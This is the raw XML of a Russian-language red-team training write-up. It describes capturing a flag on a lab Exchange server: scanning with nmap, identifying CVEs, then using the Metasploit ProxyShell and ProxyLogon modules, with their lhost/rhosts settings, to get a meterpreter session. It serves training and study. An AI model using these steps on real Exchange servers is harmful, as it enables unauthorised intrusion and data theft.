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4.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId67.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId46.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId4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4-А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Ищенко Ирина</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Мишина Анастасия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дикач Анна</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Галацан Николай</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Амуничников Антон</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Барсегян Вардан</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дудырев Глеб</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дымченко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тренировк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тренировки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Получить доступ к флагу в папке почтового сервера организации, расположенного на внешнем периметре.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="63" w:name="способы-получения-флаг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Способы получения флага</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Флаг можно получить различными способами. Предварительно необходимо произвести разведку инфраструктуры для обнаружения и дальнейшей эксплуатации уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разведка на предмет поиска вектора атаки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уязвимости ProxyShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эксплуатация уязвимости ProxyLogon</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="45" w:name="разведка-на-предмет-поиска-вектора-ата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Разведка на предмет поиска вектора атаки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для начала необходимо запустить терминал. Далее просканировать подсеть 195.239.174.0/24, для поиска открытых портов, которые можно использовать для атаки. Сканирование производится с помощью утилиты nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="4382371"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Сканирование хоста на открытые пор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хоста на открытые порты</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ходе сканирования на хосте 195.239.174.0/24 были обнаружены открытые порты: 22 и 443.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Наличие данных портов указывает, что на хосте 195.239.174.0/24 установлен почтовый сервер. В этом можно убедиться перейдя по адресу https://195.239.174.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3855755"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Проверка на наличие почтового серве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 наличие почтового сервера</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Следующим шагом необходимо определить версию Exchange Server, для этого используется режим разработчика.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="4787056"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Определение версии Exchange Server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версии Exchange Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В документации Microsoft Exchange есть информация об указанных сборках и связанных с ними уязвимостях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для дальнейшего планирования вектора атаки будем использовать https://www.cvedetails.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3124237"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="https://www.cvedetails.com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https://www.cvedetails.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В результате настройки фильтра «Microsoft Exchange Server, Common</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vulnerability Scoring System – CVSS Scores &gt;= 9» будет получен список уязвимостей доступных к эксплуатации. На возможность эксплуатации указывает наличие приписки public exploit exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2434584"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Список уязвимостей доступных к эксплуатаци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уязвимостей доступных к эксплуатации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При просмотре детальной информации об уязвимостях можно убедиться, что первая дата раскрытия</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">информации больше даты выпуска сборки атакуемого почтового сервера, значит эти уязвимости</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">можно использовать.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1721145"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Детальная информация уязвимости CVE-2021-34473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уязвимости CVE-2021-34473</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2804409"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Детальная информация уязвимости CVE-2021-26855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Детальная информация уязвимости CVE-2021-26855</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для поиска возможных векторов атаки будем использовать модуль Metasploit.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Для захвата флага необходимо получить сессию с удаленным хостом 195.239.174.1 с использованием возможности RCE. Далее произвести захват флага,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">эксплуатируя возможность RCE двумя модулями.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="5921903"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Сканирование с помощью Metasploit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1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с помощью Metasploit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="52" w:name="использование-уязвимости-proxyshell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уязвимости ProxyShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Данный модуль использует уязвимость на сервере Microsoft Exchange,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">которая позволяет злоумышленнику обойти аутентификацию (CVE-2021-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">31207), выдать себя за произвольного пользователя (CVE-2021-34523) и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">записать произвольный файл (CVE-2021-34473) для достижения RCE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Затем необходимо воспользоваться модулем</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">windows/http/exchange_proxyshell_rce. С помощью команды use 15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выбрать данный модуль и задать параметры lhost (IP-адрес атакующей</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">машины) и rhosts (IP-адрес целевой системы):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- set lhost 195.239.174.11;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- set rhosts 195.239.174.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Далее запустить модуль ProxyShell и получить meterpeter-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сессию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3275742"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Запуск эксплуатации ProxyShell" title="" id="47" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/1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эксплуатации ProxyShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После получения сессии с почтовым сервером воспользоваться</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">командой cat C:/windows/system32/flag_for_red_team.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1189463"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Получение флага" title="" id="50" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/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флага</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="62" w:name="эксплуатация-уязвимости-proxylogo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Эксплуатация уязвимости ProxyLogon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернативным способом захвата флага является эксплуатация уязвимости ProxyLogon.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Уязвимость ProxyLogon CVE-2021-26855 (SSRF) позволяет внешнему</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">атакующему обойти механизм аутентификации в MS Exchange и выдать себя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">за любого пользователя. С помощью подделанного запроса на стороне сервера</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">атакующий может отправить произвольный HTTP-запрос, который будет</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">перенаправлен к другому внутреннему сервису, от имени машинного аккаунта</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">почтового сервера. Для эксплуатации данной уязвимости нужно получить</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">доступ к почтовому ящику одного из пользователей почтового сервиса.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">В нижней части страницы портала portal.ampire.corp можно найти</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">информацию о легитимной почте одного из сотрудников.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В перечне модулей Metasploit под № 12 расположен модуль Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exchange ProxyLogon RCE. Данный модуль использует уязвимость на сервере</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Microsoft Exchange, которая позволяет злоумышленнику обойти</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">аутентификацию, выдать себя за администратора (CVE-2021-26855) и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">записать произвольный файл (CVE-2021-27065) для получения RCE.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">С использованием почты manager1@ampire.corp можно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">применить данный модуль для получения соединения с удаленным узлом.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Далее задать все необходимые параметры для модуля.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4188335" cy="3401823"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Получение соединения с удаленным узлом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35" cy="340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соединения с удаленным узлом</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Следующим шагом необходимо запустить эксплуатацию ProxyLogon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4898114" cy="4028475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Запуск эксплуатации ProxyLogon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402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эксплуатации ProxyLogon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После получения сессии с почтовым сервером можно найти флаг в файле flag_for_red_team.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5051580" cy="4073236"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Получение флага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флага</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="70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p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В результате удалось успешно произвести захват почтового сервера.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3829538"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Результат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CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3017043"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Результат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4-А</dc:title>
  <dc:creator>Ищенко Ирина; Мишина Анастасия; Дикач Анна; Галацан Николай; Амуничников Антон; Барсегян Вардан; Дудырев Глеб; Дымченко Дмитрий</dc:creator>
  <dc:language>ru-RU</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-12T18:30:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-12T18:30:19Z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